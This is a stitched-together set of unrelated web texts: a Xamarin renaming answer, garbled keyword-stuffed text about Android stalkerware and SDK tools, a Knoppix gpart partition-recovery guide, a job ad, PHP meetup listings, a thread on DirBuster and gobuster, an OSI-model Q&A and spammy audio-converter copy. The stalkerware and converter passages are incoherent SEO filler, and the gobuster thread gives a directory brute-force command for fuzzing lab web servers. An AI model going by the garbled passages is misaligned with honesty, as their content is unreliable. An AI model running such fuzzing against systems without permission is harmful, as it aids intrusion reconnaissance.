(e.g. FooViewController.cs to BarViewControllercs. Using Refactor (right click class file -> refactor -> rename) will update lots of stuff for you, including the .designer file and any references to the class throughout your code Change the string value passed to the superclass in your ViewController constructor public GrepViewController () : base ("BarViewController", null) which is required for loading the class at runtime Open your .designer file and change the Register call so that the link between XC and MD is maintained: [Register ("BarViewController")] partial class BarViewController Rename the .xib: BarViewController.xib Open BarViewController.xib in MD with source editor (right click -> open with -> Source Code Editor) and change the -1.CustomClassName key: <string key="-1.CustomClassName">BarViewController</string> Save the .xib from MD Open BarViewController.xib in XC. (If you've got it open in MD, you'll need to right click -> Open With -> XCode). Wait for indexing to complete, then open the Assistant Editor. Notice that BarViewController.h is (correctly) opened. Save the .xib from XC. Open the .xib in MD and notice that IBClassDescriber section is fully specified, even if it was empty to start with. Ship it! Hope this helps someone, clears up some mystery of the linkage between XC and MD, or at least reminds me what to do next time I run into this problem. Cheers, CM Note: I will accept this as the answer when SO allows me (in 2 days).
STACK_EXCHANGE
Android Stalkerware Readme Md At Master Diskurse Android We would like to show you a description here but the site won’t allow us. Secondly, android 5.0 and above has "google play protect", this is a service that runs on your phone and monitors it for potential threats, this service will interfere with the installation of stalkerware and therefore will be disabled by whoever is loading this software on to your phone. Master. 1 branch 0 tags. go to file code readme.md . androguard rules.yar . appid.yaml . certificates.yaml sha256.csv . view code readme.md indicators on stalkerware. indicators of compromise on stalkerware applications for android. files. appid.yaml : package ids; androguard rules.yar : androguard yara rules (to be used in koodous. Over 58,000 android users had stalkerware installed on their phones last year. kaspersky plans to show a special alert on android devices when it finds stalkerware like apps. Unfortunately, stalkerware is not just an android issue. any device that can have custom software run on it can theoretically suffer a stalkerware infected. employee’s pcs can have it installed to check on how they use their work time, for instance. flexispy is a good example of this. it was sold to jealous lovers who wanted to monitor their. Qmunicate Android Readme Md At Master Antondyach Over 58,000 android users had “stalkerware” installed on their phones last year, researchers from kaspersky lab have revealed today. of these, more than 35,000 had no idea about stalkerware being present on their android devices until they installed kasperksy’s mobile antivirus, which flagged the infection.kaspersky’s findings come to confirm a growing trend in the information. Popular android threats in 2019. contribute to sk3ptre/androidmalware 2019 development by creating an account on github. Terms and conditions this is the android software development kit license agreement 1. introduction 1.1 the android software development kit (referred to in the license agreement as the "sdk" and specifically including the android system files, packaged apis, and google apis add ons) is licensed to you subject to the terms of the license agreement. Next story download & install candy crush soda saga game for pc windows 8/8.1/7/xp & mac; previous story brawl stars mod apk 27.269 unlimited money/crystals/trophies crack data. Basecolumns; calendarcontract.attendeescolumns; calendarcontract.calendaralertscolumns; calendarcontract.calendarcachecolumns; calendarcontract.calendarcolumns. Android Learning Readme Md At Master Taifus Android Android, apps, news, privacy, security, spyware, stalkerware, technology bad reports continue to float for android fans as a researcher from kaspersky labs has revealed that in 2018 alone, 58,487 users were trapped by stalkerware applications installed on their devices. Android lollipop fixes for non emulated storage cards corrected data usage information for system apps i also have a separate debug build now for easier problems diagnostic which i send to users who ask for support. 3.6.0: better support for storage cards on android l . read more. collapse. additional information. Android 2.3.4. the sections below provide notes about successive releases of the android 2.3.4 platform component for the android sdk, as denoted by revision number. to determine what revision(s) of the android 2.3.4 platforms are installed in your sdk environment, refer to the "installed packages" listing in the android sdk and avd manager. If android:debuggable="true" is manually set, then ant release will actually do a debug build, rather than a release build. automatic proguard support in release builds. developers generate a proguard configuration file using the android tool — the build tools then automatically run proguard against the project sources during the build. I still get the sdk directory '~/library/android/sdk' does not exist although it most certainly does and has the correct permissions drwxr xr x android/ – mike s. jun 18 '19 at 19:12 sir its for windows only. Processing Android Capture Readme Zh Md At Master Sony provides patch to linux 5.9 for allowing further access restrictions on debugfs; the linux kernel begins preparing support for sd express cards. The android developer tools (adt) plugin for eclipse provides a professional grade development environment for building android apps. it's a full java ide with advanced features to help you build, test, debug, and package your android apps. free, open source, and runs on most major os platforms. to get started, download the android sdk. More android. android enterprise security source support. report platform bug report documentation bug google play support join research studies documentation. developer guides design guides api reference samples. Browse other questions tagged android android studio android sdk tools or ask your own question. the overflow blog podcast 262: when should managers make technical decisions for developers?. (the external sd card can also be partitioned to include a section dedicated to storing user apps (link2sd) or to create partitions for secondary or tertiary os on android device using some multiboot kernel and recovery system). even we can put whole os/rom on an sd card. 2. brief intro contents of android partitions can be partially or completely modified by flashing an image (filesystem .img. Readme En Md Starrtc Starrtc Android 码云 Gitee Duplicate files copied in apk readme.md in android studio project [duplicate] ask question asked 3 years, 9 months ago. the issue is not in the meta inf, it's in apk readme.md that is why i am having a hard time fixing it – user2953186 nov 29 '16 at 10:14. paste your build.gradle file here. so that we can see what is there exactly. I recently faced this problem after i installed android emulator using the sdk manager of android studio which also upgraded my android sdk tools to 26.0.1 (as it was a prerequisite according to the sdk manager of android studio). in my case, i simply replaced the tools folder of android sdk with tools folder from. Secgen/readme.md at master · cliffe/secgen · github; github – jinverar/viper shell: this is python framework designed to control; sqliv/readme.md at master · hadesy2k/sqliv · github; github – hatbashbr/shodanhat: search for hosts info with shodan; ws docker community/readme.md at master · lavalamp /ws docker community · g. Sdkmanager "platform tools" "platforms;android 28" alternatively, you can pass a text file that specifies all packages: sdkmanager package file=package file [options] the package file argument is the location of a text file in which each line is an sdk style path of a package to install (without quotes). Android accessories can be audio docking stations, exercise machines, personal medical testing devices, weather stations, or any other external hardware device that adds to the functionality of android. accessories use the android open accessory (aoa) protocol to communicate with android devices, over a usb cable or through a bluetooth connection.
OPCFW_CODE
|< Day Day Up >| If you have ever made a typo when deleting or restoring the MBR, you probably also have trashed your partition table. Use gpart, included on the Knoppix disc, to restore lost partition tables . OK, so you had a little too much fun with the previous hack, ignored the warnings, accidentally typed 512 when you should have typed 446, and now your partition table is gone. Or maybe you accidentally ran fdisk on the wrong drive. No problem. Just restore from the backup you made before you started. You did back up your MBR, right? Don't worry; it happens to the best of us. The last time I trashed my partition table, I was trying to update grub on my laptop using dd . Like an idiot, I followed the instructions to create a grub boot floppy and applied them to install grub on my laptop's hard drive. Overwriting the first 512 bytes of a floppy with the grub boot sector is fine; overwriting the first 512 bytes of my hard drive is not. I was unable to boot and had no partition table. For many people, this might have been the time to reinstall, but I knew the files and partitions were thereI just couldn't get to them. If only I had a tool to figure out where the partitions began and ended, I could then recreate my partition table and everything would be back to normal. Lucky for me, there is such a tool: gpart (short for "guess partition"). Gpart scans a hard drive for signs of a partition's start by comparing a list of filesystem-recognition modules it has with the sectors it is scanning, and then creates a partition table based on these guesses. Doubly lucky for me, gpart comes included with Knoppix, so I was able to restore my laptop's MBR without having to take apart the laptop and hook the drive to a desktop machine. I ran gpart , checked over its guesses, which matched my drive, and voila! My partitions were back. Gpart is an incredibly useful tool, and I am grateful for it; however, it does have its limitations. Gpart works best when you are restoring a partition table of primary partitions. In the case of extended partitions, gpart tries its best to recover the partition information, but there is less of a chance of recovery. To recover your partition table, run gpart , and then tell it to scan your drive: knoppix@ttyp0[knoppix]$ sudo gpart /dev/hda By default, gpart only scans the drive and outputs results; it does not actually write to the drive or overwrite your MBR. This is important because gpart may not correctly guess all of your partitions, so you should check its guesses before you actually write them to disk. Gpart scans through the hard drive and outputs possible partition tables as it finds them. When it is finished scanning the drive, gpart outputs a complete list of partition tables it has found. Read through this list of partitions and make sure that it reflects the partitions you have created on the disk. It might be that gpart can recover only some of the partitions on the drive. Once you have reviewed the partitions that gpart has guessed, run gpart again but with the -W option to write the guessed partition table to the disk: knoppix@ttyp0[knoppix]$ sudo gpart -W /dev/hda /dev/hda This isn't a typo; you do actually put /dev/hda twice in the command. You can potentially tell gpart to write the partition table to a second drive, based on what it detected on the first drive. Once the partition table has been written, reboot and attempt to access the drives again. If you get errors when mounting the drives , check the partitioning within Knoppix with a tool like fdisk , cfdisk , or qtparted to see whether gpart has incorrectly guessed where your partition ends. I've had to modify a partition that gpart ended 4 MB too early, but afterwards, the filesystem mounted correctly, and I was able to access all of my files. It is scary to be in a position where you must think about partition-table recovery. At least with Knoppix and gpart , it's possible to recover the partition table without completely reinstalling the operating system. |< Day Day Up >|
OPCFW_CODE
Bloomberg Second Measure is a leading provider of data analytics that delivers valuable insights into company performance and consumer behavior. Using data from billions of anonymized transactions, we have built a self-service analytics product for daily tracking and real-time exploration of 5,200+ public and private companies. Clients use our product to discover new markets, gain an advantage in financial investments, and inform their competitive strategies. To experiment, develop, and produce the accurate, high-quality data we deliver to our clients, our team relies on distributed data storage and processing systems. We're looking for Software Engineers to architect and develop these systems to (1) reliably store and manage data; (2) to capture metadata about our data and the processing of it; and (3) and to evolve how our engineers and data scientists query our data. We'll trust you to: You'll need to have: - Design, build, and manage mission critical systems for accessing and managing data within our platform, including data discovery, monitoring, metadata (lineage, history, schema), and query layers - Build and maintain libraries and integrations for data processing systems to leverage discovery, monitoring, metadata, and access functionality - Collaborate with data scientists, engineers, and product managers to understand the emergent workloads and needs to support the product - Analyze, understand, and solve performance and scalability problems We'd love to see: - Experience designing, building, and supporting production systems in Java and Python - Familiarity with different database technologies, such as distributed query engines (Presto/Trino), analytics data stores (Clickhouse, Apache Druid), scalable key-value stores (Cassandra, Redis) with understanding of the internal design and implementation - Familiarity with data processing ecosystem, such as Apache Spark, Apache Flink, and Dask - Familiarity with data governance and metadata ecosystem, such as Apache Atlas, DataHub, Marquez, Metacat, Hive Metastore - Experience building APIs, especially Thrift and gRPC. - Experience with working with structured (Parquet, Avro, Orc, Protocol Buffers) and unstructured data (CSV, JSON) - Strong fundamentals in distributed systems design and development - Experience in building and operating extensible, scalable, and resilient systems - A self starter with the ability to work effectively on a team with excellent spoken and written communication - BA, BS, MS, PhD in Computer Science, Engineering or related technology field If this sounds like you: - Experience working with Kubernetes to deploy and serve mission critical systems and services - Experience evolving, operating, and supporting either distributed query engines (e.g., Presto/Trino), analytics data systems (e.g., ClickHouse or Apache Druid) or scalable key-value stores (Cassandra, FoundationDB, Redis, DynamoDB) - Familiarity with using and running production systems within AWS Apply if you think we're a good match. We'll get in touch to let you know what the next steps are. Bloomberg is an equal opportunities employer, and we value diversity at our company. We do not discriminate on the basis of race, religion, color, national origin, gender, sexual orientation, age, marital status, veteran status, or disability status.
OPCFW_CODE
- Coding Horrors - A Horror Film Fan's Guide to PHP Coding Nightmares For June's meetup, we have Mark Baker (https://twitter.com/Mark_Baker) with his talk "Coding Horrors - A Horror Film Fan's Guide to PHP Coding Nightmares". Abstract: Most of us are probably aware of code smells, code that doesn't apply SOLID principles, code that should be refactored to make the system easier to maintain. But there are other coding horrors that should trigger alarm bells whenever we see them. Like a good horror movie, coding horrors should scare us when we find them, because they're often symptomatic of deeper problems. So let's take a short tour of some of the greatest horror movies ever made; and some of the most worrying code horrors that I've seen. - Dr Sheldon Cooper Presents: Fun with Flags For April's meetup, we have Michael Heap (https://twitter.com/mheap) back with us with his talk "Dr Sheldon Cooper Presents: Fun with Flags". Abstract: No no, not country flags, feature flags! Feature flags are a powerful technique that allows teams to modify a system’s behaviour without changing code. They can be used several reasons – canary releases and A/B testing to name a few. This talk will show you how you’re already using feature flags in your application without realising it. Next, we’ll take a look at some of the best tooling out there to help you take feature flags to the next level. Finally, we’ll cover strategies for removing feature flags before they become technical debt that you have to manage. - Crafting Quality PHP Applications For March's meetup, we have James Titcumb (https://twitter.com/asgrim) with us with his talk "Crafting Quality PHP Applications". Abstract: This prototype works, but it’s not pretty, and now it’s in production. That legacy application really needs some TLC. Where do we start? When creating long lived applications, it’s imperative to focus on good practices. The solution is to improve the whole development life cycle; from planning, better coding and testing, to automation, peer review and more. In this talk, we’ll take a quick look into each of these areas, looking at how we can make positive, actionable change in our workflow. - Christmas Social Every year we always end up organising this too late at which point people already have plans but there can be no excuses this year with us getting it out there early! The Christmas social is a nice opportunity for us all to sit down and have some good food and drinks and get into the festive spirit! We'll update this with more details in the coming weeks. - Get GOing with a new language For October's meetup, we have Kat Zien (https://twitter.com/kasiazien) with us with her talk "Get GOing with a new language". Abstract: Learning more than one programming language is key to becoming a better developer. It is like adding a new tool to your toolbox. The more tools you have, the easier and quicker you’ll be able to tackle whatever job you need to do. You’ll also be able to use the right tool for the job, and who doesn’t like that?! I picked up Go (golang) over a year ago as it was becoming more popular among developers. Coming from a PHP background, I had no idea what channels or goroutines were or how is concurrency different from parallelism. I’ve got to say, it was a whole new world. Very different, but very cool. I was hooked! By happy coincidence, my company was looking to rewrite a legacy PHP app in Go. It was over 2000 lines of procedural and messy PHP4 with more downtime than I’m willing to admit to. I took on this project, and soon enough we had a much faster, more maintainable and much more reliable app for our customers. Go gave us options we would not have in PHP. The goal of this talk is to give you a good idea of what Go is and how it compares with PHP. We’ll look at the language itself as well as the tooling and communities around it. Even if you’re not sold on Go by the end of it, I hope you’ll leave inspired to go out there and learn whatever language you wanted to look into next. - Teaching the next generation... For September's meetup, we have Michael Woodward with us speaking about teaching the next generation. Abstract: The next generation of developers are looking for learning resources, Universities are not able to provide the platform required to everyone, it comes at a high cost... Current free resources are lacking behind with new improvements in the language. Here's how we're filling that requirement. PHP School, a completely Open Source learning platform for "students" to push themselves, at their own pace, not driven by deadlines but topics of interest. Teach the skills that are required, show off your project with a tutorial workshop! The possibilities are endless, let's help shape the next generation. - PHP School Workshop With a difference to our usual schedule, rather than holding a July meetup on the last Thursday of the month, we'll be welcoming the PHP School team, Michael Woodward and Aydin Hassan, to PHP Warwickshire on Thursday 10th August to run a workshop! What is PHP School? A dedicated community based learning platform that will teach you the core skills in PHP. The concept behind PHP School is small standalone workshops, workshops are run from the command line, somewhere every developer should be familiar with. Each workshop covers a different topic, some beginner, some advanced. You're not restricted to a schedule, you go at your own pace with no pressure. Who is the Workshop for? Everyone! It doesn't matter if you have never touched PHP or if you are an expert. You may want to take part in the workshop or come along to learn more about how to contribute to PHP School itself! How to Prepare for the Workshop... In order to take part in the workshop and work along with us you'll have to bring a laptop or group up with others who bring a laptop. We are happy for you to form your own group although if you want to take part but do not have a laptop or group don't worry, we will address this at the start of the meetup. If you are planning to bring a laptop, it would be ideal to install PHP School beforehand by following the steps here: https://phpschool.io/#installation If you do not have PHP installed natively or just prefer this option, Docker can also be used: https://github.com/php-school/docker-phpschool Again, installation beforehand is ideal but do not worry if you can't do this. We'll help you at the start of the meetup. - Is what you've coded what you mean? For June's talk, we have Dave Liddament (https://twitter.com/daveliddament) with us talking about Is what you've coded what you mean? Abstract Imagine a venn diagram of your last software project. Consider three parts: what the code should do, what the code actually does and what the developers think the code does. The greater the overlap between all 3 of these the more successful and bug free your software is likely to be. This talk examines how to increase this overlap. Specifically how to reduce the gap between what the code actually does and what the developer thinks the code does.We'll look at the importance of type hinting, assertions and things called value objects.We'll then look at how these techniques can be combined with modern IDEs to: reduce the chance of introducing bugs minimising the cost associated with any bugs that do slip through the net safely refactor code so we can rename classes, methods and variables to be more explicitBy the end of the talk you'll have picked up tips on how to write cleaner software with fewer bugs that does what it's supposed to do. Bio:Dave is a Director and developer at Lamp Bristol, a software consultancy. Today he codes in PHP and uses the Symfony framework. In the past he's written software commercially in many languages including C, Python, Java as well as PHP. Dave is keen to pass on his knowledge. He helps organise PHP-SW (https://phpsw.uk/) where he occasionally talks at. He also runs a monthly workshop (https://www.meetup.com/Bristol-PHP-Training/) that offer introductions to topics like testing, setting up a CI environment and git. When not busy coding Dave enjoys scuba diving and running. - Round Table Discussion This month we do not have a talk but will instead be holding round table discussions. These type of events are often very productive and also give everyone more of a chance to get involved and get to know each other. If you have any topics you'd like to discuss or hear other opinions about, feel free to let us know online or on the night! - Kickass Development Environments with Docker For April's meetup, we have David McKay (https://twitter.com/rawkode) with us doing his talk "Kickass Development Environments with Docker" Abstract Docker, the hottest technology around at the moment. It swept the Ops world by storm in 2014, became mainstream in 2015, and dominated the developer world in 2016. Docker is a tool that allows you to package your application up into a single-runnable distributable binary - akin to the phar, but in Hulk mode. Docker allows you, a developer, to specify the exact environment your application needs to run, across development; test; staging; and production. In this talk I will cover the creation of this utopian distributable and show you how to can compose your entire production infrastructure locally with only a small YAML file and without installing a single thing. Lets say hello, to Docker.
OPCFW_CODE
Fuzzing a webserver using DirBuster So I've been attempting to use dirbuster to fuzz a few vulnerable machines. I haven't been satisfied with the outputs so I started trying some manual fuzzing and then referencing the default dirbuster wordlist as well as others to make sure it wasn't a singular issue. For example, when fuzzing using the default dirbuster medium size wordlist, 5 results appear. I know I can manually get 200 & 403 responses from pages like /config, /admin, or /mail, but they are not appearing in my dirbuster results even though they exist in the wordlist I'm using. I get an output like /error, /icons, /mailman, /pipermail, /cgi-bin, and nothing else, even though I verified the other pages exist in the wordlist and manually test correctly. Does anyone out ther have an idea on what mistake I'm making that is getting such a weird output? I can only recommend to use an other software. My favorite for the moment is dirb. That's a good idea, I've been messing with it and rerunning scans in the background hoping I could figure out what I was doing wrong. And now that I think about it, it could be because I didn't launch dirbuster with sudo privilege. @Hadoken why would dirbuster need to be run as root? @AndrolGenhald I'm inexperienced with the software and thought maybe it could be an issue with how the software was making requests. However I do believe it's an issue with its configuration, I'm just blind and not knowledgeable enough to understand my mistakes. @Hadoken Your first instinct upon software not working should not be "Let's try it as root!" At the very least make sure that it actually needs such privileges. I'm with @maggick - try dirb and see if you get any different output. Or the one mentioned below, gobuster. Not only are the command line tools faster (from memory the dirbuster gui app is awfully slow), but also you will get some data to re-inforce the so-called 'weird output' or some different data which may allow you to draw other conclusions and solve the problem you're having. I love the OWASP project and community (I'm actually part of it), but I don't like DirBuster at all, which is an OWASP project. It's very slow compared to other similar tools, and it easily crashes if you try to load a big wordlist. "Does anyone out there have an idea on what mistake I'm making that is getting such a weird output?" You may be not making any mistakes; from my experience about 1-2 years ago DirBuster seemed a fairly unreliable tool, especially when using middle/large-sized lists, so it may be simply malfunctioning. I strongly recommend gobuster. It's a command line tool, fairly flexible, and super fast. Most pentesters I know choose gobuster over any other similar free tools. You could start with a command like the following one, explore the different options, and tune it according to your specific needs: gobuster -u http://A.B.C.D/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt -s 200,204,301,302,307,403,500 -e If you don't have one already, I recommend you get a Kali Linux VM so you can have lots of tools (including gobuster, dirb, and DirBuster) to play around with. Kali also comes with many good wordlists such as the one referenced in the command above. Although this might be good advice, it doesn't answer the original question. @forest Fair enough. For the question "Does anyone out there have an idea on what mistake I'm making that is getting such a weird output?", I'll answer: you may be not making any mistakes; from my experience DirBuster is a fairly unreliable tool (especially when you use middle/large-sized lists), so it may be simply malfunctioning.
STACK_EXCHANGE
Does the PDU always go through all the 7 layers in OSI Model? Every explanation about the OSI Model (or other Models) always gives me the impression that the data (PDU) from the top layer (Application Layer, L7) always go through all of the layers until the bottom layer (Physical Layer, L1). Does the PDU always go through all the 7 layers in the OSI Model? Or we can choose until which layer we want to apply our communication protocol? These examples might explain more about my confusion. Let's say I have an IPSec (Network Layer, L3) hardware on an FPGA. IPSec provides many Security Services already. Does it mean I bypass the Datalink Layer? Another example is when we are communicating via SSL. Does it mean I bypass all the layers after it except the Physical Layer? The OSI model is a way of conceptualizing networking. It is not a specification to which code has been written or the Internet has actually been designed. Don't take it too literally. As @MichaelHampton points out, get the ideas of abstraction and encapsulation from the OSI or IP models, but don't believe that is exactly what happens in the real world. OSes do not implement separate layers 5 to 7. Some applications may implement separate layers 5 to 7, e.g. web browsers, but most do not. The IP model is closer to reality, but there are many exceptions to it. No layer gets bypassed. Here is a good visualization from https://www.webopedia.com/quick_ref/OSI_Layers.asp: So, let's say I have two FPGAs communicating via IPSec. Do I bypass the Datalink Layer and go directly to Physical Layer? Ofcourse we always use Physical Layer. It is a conceptual model. Nothing is bypassed. In reality everything is physical, right? Capture some actual packets on a physical interface with some VPN traffic. Dissect the capture with Wireshark. You will see encapsulation, the data contents of the lower layer containing the necessary upper layers. So, you might have Ethernet, containing IP UDP, containing an encapsulation header, containing IP TCP, containing data. The Ethernet frame is still required to traverse the physical link. IP UDP at layer 3 routes to the VPN end point. This might go through routers of the underlay network. IP TCP at layer 3 contains the tunnel network. The unwrapped packet is routed to its destination. That's just enough layers to get the job done. Note how the VPN routes without caring about the higher layers of the application. It does not matter that the data happens to be HTTPS protocol, with its own added features like TLS encryption. It could just as easily be the archaic Daytime Protocol, very simple and probably just one packet.
STACK_EXCHANGE
Fixed numpy value error on string Hi this is an awesome library, thanks for sharing this! I hit an issue when trying to run example 2 import pandas as pd from time import sleep from lightweight_charts import Chart if __name__ == '__main__': chart = Chart() df1 = pd.read_csv('ohlcv.csv') df2 = pd.read_csv('next_ohlcv.csv') chart.set(df1) chart.show() last_close = df1.iloc[-1] for i, series in df2.iterrows(): chart.update(series) if series['close'] > 20 and last_close < 20: chart.marker(text='The price crossed $20!') last_close = series['close'] sleep(0.1) This is when chart.update(series) is called in the above example, then in a method _single_datetime_format is where I see the issue. I think pd.api.types.is_datetime64_any_dtype is expecting an array like data type but doesnt like strings? (which I thought it would). Anyways, this was my work around. Are you able to repro this? Or am I the only one hitting this issue? Here is my environment altair==5.1.1 attrs==23.1.0 blinker==1.6.2 bottle==0.12.25 cachetools==5.3.1 certifi==2023.7.22 cffi==1.15.1 charset-normalizer==3.2.0 click==8.1.7 clr-loader==0.2.6 colorama==0.4.6 gitdb==4.0.10 GitPython==3.1.33 idna==3.4 importlib-metadata==6.8.0 Jinja2==3.1.2 jsonschema==4.19.0 jsonschema-specifications==2023.7.1 lightweight-charts==<IP_ADDRESS> markdown-it-py==3.0.0 MarkupSafe==2.1.3 mdurl==0.1.2 numpy==1.25.2 packaging==23.1 pandas==2.1.0 Pillow==9.5.0 protobuf==4.24.2 proxy-tools==0.1.0 pyarrow==13.0.0 pycparser==2.21 pydeck==0.8.0 Pygments==2.16.1 Pympler==1.0.1 python-dateutil==2.8.2 pythonnet==3.0.2 pytz==2023.3 pytz-deprecation-shim==0.1.0.post0 pywebview==4.3.2 referencing==0.30.2 requests==2.31.0 rich==13.5.2 rpds-py==0.10.0 six==1.16.0 smmap==5.0.0 streamlit==1.26.0 tenacity==8.2.3 toml==0.10.2 toolz==0.12.0 tornado==6.3.3 typing_extensions==4.7.1 tzdata==2023.3 tzlocal==4.3.1 urllib3==2.0.4 validators==0.21.2 watchdog==3.0.0 zipp==3.16.2 Which I got by doing pip install lightweight-charts pip install streamlit Seems to be an issue with the new version of pandas; can't seem to figure out what is causing it, but the implementation you provided will work. Thanks! Louis
GITHUB_ARCHIVE
On October 18, 20 years ago, the first commit landed in the OpenBSD CVS repository. Today, on the 20th anniversary, the beastie.pl team invites all readers to a series of interviews conducted by our team with project developers. Bryan Steel was the first On October 18th 20 years ago the first commits to the OpenBSD project landed in the CVS repository. Today on the anniversary the beastie.pl team invites all readers to a series of interviews that our staff was conducted with the project developers. We start off with Bryan Steele. 1. For the readers who don’t know you, can you shortly introduce yourself? I’m Bryan Steele ( brynet @ ), I post silly stuff under the twitter account @canadianbryan and mostly just waste time on irc & reddit. 2. Why did you choose to run OpenBSD? How long have you been using it? I chose OpenBSD after running a few different Unixen, I originally was a DOS / Win user like many kids born in the 80’s raised in the 90’s. I discovered QNX at school on the Unisys / Burroughs ICON computers, but all I remeber is playing adventure games and LOGO. For awhile I played with Unix on my 486 and later P1 & AMD K6 computers at home, first getting a copy of Coherent UNIX and then eventually Slackware Linux when I finally had Internet access. I somehow landed on OpenBSD around 3.7 and have been using it ever since. 3. For those readers that still haven’t joined the OpenBSD community, why should they try OpenBSD? It’s a good community to be a part of, even if your not comfortable taking an active role at first .. there’s a lot of smart people working on cool things and just watching and using it can teach you a lot. My first time using OpenBSD was to setup an IRC server so I could extend a friends network to Canada. I switched over systems one by one and over the years found it well suited for a wide variety of different roles, be it a flexible router / server or desktop. 4. Is OpenBSD your daily driver at home & at work? Yes. I run OpenBSD on both my laptops and desktops, the work being done by jsg @, kettenis @ and matthieu @ mean X works great on my hardware, and the porters do an amazing job keeping all the upper stacks updated and working, given so few developers and hours in the day. 6. Can you tell us about some OpenBSD-related areas you work on? I started sending patches in 2009/2010 or so for a bunch of small things, and then in 2010 I got a fancy new dual-core AMD laptop that „just worked“ except for a lack of CPU frequency scaling. I started learning about the newer AMD hardware and reading fancy docs like the BKDG (BIOS Kernel Developer Guides) and finally had something that worked, I then emailed tech @ and developers that worked on similar parts of the tree and eventually it was committed by claudio @. Lately? I’ve been working on my own things, but occasionally find time between slacking (..so much TV) to write mail or send a diff or two. 5. How did you become an OpenBSD developer? What do you think is required in order to join the OpenBSD project as a developer? I got a mail from deraadt @ one day asking for a master.passwd line almost out of the blue. I think showing both an interest at working on something individually and together with a team is important. 8. OpenBSD tends to lead in development best practices does it work the other way around? Is there a process improvement the project started or aims to adapt from the oustide world? I think the work on tame ^ Wpledge will be interesting, reviewing the diffs and commits has been a fascinating look at how programs are designed, but also where improvements can be made. I also think that nicm @ ‚s privsep / sandbox file (1) deserves some more attention, file is a utility that people run against anything, often as root, indiscriminately. It also shouldn’t be able to open sockets or write to files. 9. It’s been a long 20 years of amazing releases. What are you most proud of and what would you like to revisit / redo? To be a part of it, even in a minimal role, for some 10 of those years, and now almost 4 as a developer.
OPCFW_CODE
This pack includes every natively supported free encoder binary for use with the Converter foobar2000 component. >As no tagging software moreover Amarok appeared to be accessible for WavPack files, …There are at the least two I do know of: MB Picard (which is the place are the TagLib plugins from, btw) and Ex Falso. The binaries are conveniently put in into a subfolder of the foobar2000 installation folder. To join files collectively, choose all the video clips you wish to merge. Select ”Merge Selected into One” from the context menu. Best program to transform from kar to mp3 his comment is right here: -kar-to-mp3 nice piece how do I convert kar to mp3 on-line free even With the help of this versatile online audio converter, you may be freely to listening whatever songs from on-line music websites corresponding to Pandora Radio, MySpace, YouTube, Yahoo, , and so forth at anytime as you want. IDealshare VideoGo, the perfect WV Converter, can quick and batch convert WavPackwv to just about all in fashion audio format on Mac or House windows. It’s a lossless compression sort that means that the compression takes place without knowledge being discarded. Free Lossless Audio Codec, or FLAC for short, is an audio compression technique. FLAC is an open supply codec. FLAC is a format that’s recommended to these backing up a CD collection as a result of the sound high quality will remain high, whereas MP3 compression will end in a deterioration in comparison with the unique. Is the most common format for storing audio. Click on ”Add Info” to determine on WV recordsdata after which add them to conversion file. Virtually any player on any platform can open mp3 information. The audio is compressed with loss of quality, however the loss is negligible for the usual client, and the file dimension is usually lower than that of the distinctive files. Click on on ”Convert” button to rework WV files to MP3, WAV, FLAC, APE, WMA, OGG, AC3, and AIFF. The converter also convert recordsdata to common formats such as WAV, AWB, AU, MMF, AAC, MP3, MP2, MPA, and many others. It might convert CDA to OGG, DAT to AAC, OMA to M4R (iPhone ringtone), VOB to AC3, ULAW to WAV, SWF to M4A (MPEG-four audio), and so forth. The converter gives many helpful features. WV to FLAC Conversion Software program converts WV recordsdata to FLAC and retains ID3 tag. For instance, automatically normalizes volume of WV and FLAC so that each one output recordsdata have the same volume; skips the primary X milliseconds of WV and FLAC recordsdata when changing; only converts X milliseconds of WV and FLAC information; joins a number of recordsdata to one file. You possibly can edit, create new presets, or delete olds ones. FLAC is an an open format and royalty-free coding format for lossless compression of digital audio. This converter is extremely customizable with versatile settings. It also lets you extract audio from CDs, YouTube, and most video codecs. Output formats supported embrace MP3, WAV, M4R, M4B, OGG, FLAC, AMR, ALAC, AAC, and WMA. There’s a preset editor offered for each format that can assist you customize it to your style. Free Studio supports 28 enter audio formats including MP3, FLAC, WAV, and WMA. WavPack, with file extensionwv, is a free, open source lossless audio compression format. wv to flac audio converter online free to FLAC Conversion Software program program converts WV info to FLAC and retains ID3 converter provides many helpful features. Ask yourself what is a perfect audio converter for you? And certain straightforward-to-use? The one with built-in audio player and CD ripper? Supporting all audio formats? We’ve simply the one you can dream of – Whole Audio Converter. To be handled through command line? It might compress (and restore) eight-, 16-, 24-, and 32-bit mounted-level, and 32-bit floating level audio recordsdata in theWAV file format. when in comparison with the flac. To someone who does not perceive audio and to the naked ear they’re nearly identical. I’ve tested this on my rig with the start of a Mozart monitor (the first 30 seconds) and there have been some artifacts which were only barely better represented on the wav. Another methodology is to use a free instrument referred to as All2MP3 which can convert audio formats akin to, APE, MPC, FLAC, free wv to flac converter скачать wv to flac converter, OGG, WMA, AIFF, and WAV to MP3 format. Various audio formats exist, and every has its personal distinctive features. Some preserve wonderful sound quality, some might be played solely on specific units, some provides compact dimension, and others are so uncommon that you have no thought which programs can open them. To get pleasure from music stored in exotic codecs that you media player does not help, you may want to install an audio converter software program that promises to transform the audio tracks to a supported format. The one factor you might must be involved about is that in case your FLAC file is a higher than normal bit depth like 24, 32 or sixty four bits per sample, or has a crazy multichannel configuration. CUE Splitter – Extract audio tracks from the Audio CD pictures into MP3 or WAV information primarily based on the CUE sheet. Convert your audio file to MP3 in prime quality with this free on-line MP3 converter. As soon as I opened the information in quicktime and exported them asaif they have been positive, nevertheless this defeats the purpose of a batch converter.
OPCFW_CODE
